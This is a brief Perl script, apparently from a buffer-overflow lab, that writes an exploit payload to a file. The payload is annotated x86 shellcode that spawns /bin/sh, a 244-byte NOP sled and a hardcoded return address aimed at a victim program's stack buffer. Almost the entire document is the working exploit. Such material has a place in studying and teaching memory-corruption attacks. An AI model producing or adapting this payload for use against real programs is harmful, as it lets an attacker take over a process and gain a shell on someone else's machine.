#!/usr/bin/perl # shellcode for spawning a new shell in victim's machine my $shellcode = "\x31\xc0". # xorl %eax, %eax "\x50". # pushl %eax "\x68\x6e\x2f\x73\x68". # pushl $0x68732f6e "\x68\x2f\x2f\x62\x69". # pushl $0x69622f2f "\x89\xe3" . # movl %esp, %ebx "\x99". # cltd "\x52". # pushl %edx "\x53". # pushl %ebx "\x89\xe1". # movl %esp, %ecx "\xb0\x0b" . # movb $0xb, %al "\xcd\x80" # int $0x80 ; # Address of the bottom of the stack = 0xBFFFF080 # Address of the writebuf = 0xbfffe990 # Offset between 2 addresses = 0x6f0 # This address must match the writebufs address */ my $retaddr = "\x90\xe9\xff\xbf"; #0xbfffe990 # Fill NOP instruction my $pad = "\x90" x 244; # Input string to our victim's program my $arg = $pad.$shellcode.$retaddr; # Let us store the input string to a file open OUT, "> payload_divulge"; print OUT $arg; close OUT;